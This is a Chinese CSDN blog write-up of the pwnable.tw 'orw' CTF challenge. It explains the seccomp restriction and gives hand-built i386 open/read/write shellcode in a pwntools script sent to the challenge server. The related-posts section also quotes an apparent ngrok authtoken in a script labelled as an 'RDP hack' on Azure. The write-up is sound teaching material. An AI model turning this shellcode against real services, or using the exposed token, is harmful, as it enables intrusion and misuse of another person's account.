pwnable.tw---orw

最新推荐文章于 2023-09-22 13:19:22 发布
最新推荐文章于 2023-09-22 13:19:22 发布
阅读量1.5k 收藏
点赞数
分类专栏: Pwnable.tw
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35495684/article/details/80161177
版权

pwnable.tw—orw

这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。

题目分析:

照例:
这里写图片描述
就开了栈保护,虽然都没有什么用。

题目开始就是让你输入shellcode。
就用msf随便试了几下,发现有些被过滤了。
调试看看:
这里写图片描述
发现调用了seccomp,百度了下是一个linux的类似白名单的东西,它能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system calls),即read(), write(), exit()和sigreturn(),否则进程便会被终止。
seccomp详解

OK,那就是shellcode只能使用read(),write(),但是好像不能做些什么,又不能像start一样写执行的shellcode(调用execve),所以很自然的想到了open()。

思路分析

写好设计代码,然后转化成汇编,然后在转化成机器码。

执行测试

伪代码:

char *file="/home/orw/flag"
sys_open(file,0,0)
sys_read(3,file,0x30)
sys_write(1,file,0x30)

汇编代码:

#coding:utf-8
from pwn  import *

file_name="./orw"
context(log_level = 'debug', arch = 'i386', os = 'linux')
#p=process(file_name)#本地
p=remote('chall.pwnable.tw',10001)#远程
#shellcode=asm(shellcraft.sh())
shellcode=""
shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x67616c66; push 0x2f77726f; push 0x2f656d6f; push 0x682f2f2f; mov ebx,esp;xor edx,edx;int 0x80;')
#open(file,0,0)
shellcode += asm('mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov dl,0x30;int 0x80;')
#read(3,file,0x30)
shellcode += asm('mov eax,0x4;mov bl,0x1;int 0x80;')
#write(1,file,0x30)
def pwn():
    recv = p.recvuntil(':')
    p.sendline(shellcode)
    flag = p.recv(100)
    print flag
pwn()

后面看别人的weiteup发现是可以dump出程序可执行的函数的。
明天再试试
https://blog.csdn.net/qq_29343201/article/details/78109066?locationNum=3&fps=1

Jaken1223
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1551
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
pwnable.tw orw writeup
jmp esp
09-27 1869
题目题目比较简单就不复制了,首先seccomp设置了白名单,然后输入0xc8长度shellcode,直接跳到shellcode执行。分析既然是练习,就要彻底一点。 首先是seccomp dump的问题,目前采用的方法是IDApython脚本dump数据下来,然后输入scmp_bpf_disasm。IDApython的文档非常诡异,函数没有说明,函数的参数也不能直接看出来,所以搜了很长时间找了一个别
pwnable.tw-orw
qq_35661990的博客
10-27 461
Read the flag from /home/orw/flag. Only open read write syscall are allowed to use. nc chall.pwnable.tw 10001 这是pwnable.tw orw的题目描述,只能用syscall只能用open、read、write 从ida看源代码 int __cdecl main(int ar...
Pwnable.tw orw [Writeup]
柷敔的博客
02-18 549
题源 https://pwnable.tw/challenge/#2 题解 先看一下安全保护情况 再IDA一下源码 其中seccomp是一个开启内核system call保护的函数。通过这一函数可以划定程序准许用户态调用的系统函数,相当于划定白名单,即题目所言【仅开启了open、write、read】。 简单分析函数可知,该程序直接执行了用户输入的shellcode。结合题目意思,可以使用open函数打开flag文件,然后read读出文件内容,最后write输出到控制台。 使用的python程序如下:
pwnable.tw - orw
不急不躁
07-09 3028
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
aserteee:我的GitHub个人资料的配置文件
03-22
职位: 作业:Create_Windows_2019_Azure_...脚本: 回声ngrok的authToken “1q6MPXb3oRW5wyDpZkfqLaw2lMh_46EQ4JLUPuaCW3MRrQwGL”> NGROK.bat卷曲-s -O AzureNgrokAutoRegion.bat显示名: '运行RDP哈克在Azure管道'
NetApp_7-mode常用指令
11-17
- 使用`exportfs -i -orw=host1 /vol/vol1/home`来为特定主机提供读写权限。 ### 进阶操作 - 跨域、子网和NetGroup的资源共享。 - 收集NFS性能统计信息。 - 进行NFS性能调优。 - 故障排除技巧。 ### NIC 设置 - **...
vagrant-neosdev:TYPO3 Neos 和 Flow 通用开发服务器
05-31
已弃用! 请参阅 (使用 ansible 代替 puppet) MOC TYPO3 Neos and Flow 通用开发服务器 用于在类似于 MOC 托管生产机器的环境中开发 TYPO3 Flow 和 Neos 站点...sudo mount -orw -oresvport -t nfs 192.168.66.80:/
欧姆龙omronPLC指令.pdf
11-16
- `ANDW`,`ORW`,`XORW`:双字逻辑与、或、异或,用于处理双字型数据的逻辑运算。 - `NEG`:求补指令,用于计算二进制数的补码。 6. **浮点数处理指令**: - `FIX`,`FLT`:浮点数与整数之间的转换。 - `+F`,...
欧姆龙omronPLC指令.docx
11-16
逻辑指令(如ANDW、ORW、XORW、COM等)用于执行位级逻辑运算。 浮点数处理指令(如FIX、FLT、+F、-F、/F、*F等)支持浮点数的运算,这在处理精度要求高的数学问题时是必不可少的。 子程序和中断控制指令允许编写可...
pwnable.tworw
最新发布
qq_61670993的博客
09-22 112
32位orw,很简单没啥好说的。
pwnable_orw
Morphy_Amo的博客
03-14 234
seccomp沙盒
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1323
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
pwnable.tw start&orw
weixin_30809173的博客
01-24 163
emm,之前一直想做twpwnable苦于没有小飞机(,今天做了一下发现都是比较硬核的pwn题目,对于我这种刚入门?的菜鸡来说可能难度刚好(orz 1.start   比较简单的一个栈溢出,给出一个linux 0x80系统调用的参考网址,就决定是他了 参考之可以发现al=0x3执行sys_read时长度是0x3c*size_sz,栈的长度是0x14,明显的栈溢出。由于没有开启NX,所以直接...
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 1918
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知道了是沙盒机制,具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
pwnable.tw【start】
weixin_51055545的博客
04-22 352
检查程序 任何保护都没开, 放到IDA中分析: 逆向分析 很简单的一个程序,只有start和exit两个函数,通过分析汇编,我们知道,程序先write出欢迎的语句,然后系统调用read(),来让我们输入,我们输入的栈上是可读可写可执行的,所以我们leak出stack地址,然后控制程序返回到我们构造好的shellcode即可, 思路 1.通过构造write()来leak出栈地址 2.通过控制返回地址,来执行我们的shellcode,从而达到getshell的目的. exp分析: io.recvuntil(
Pwnable.tw WP
AlexYoung28的博客
08-18 874
Pwnable.tw start 我们分析上图程序的汇编代码: 上图中的第一个方框,其实是将 : Let's start the CTF:  这句字符串压进栈; 第二个方框:其实是 system_write()函数, 参数中 fd =1, 说明是标准输出,也就是将 字符串打印输出在屏幕上; 第三个方框: 其实 标准输入函数,允许输入的长度是 3ch 也就是 60个字节; 但是buffe...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值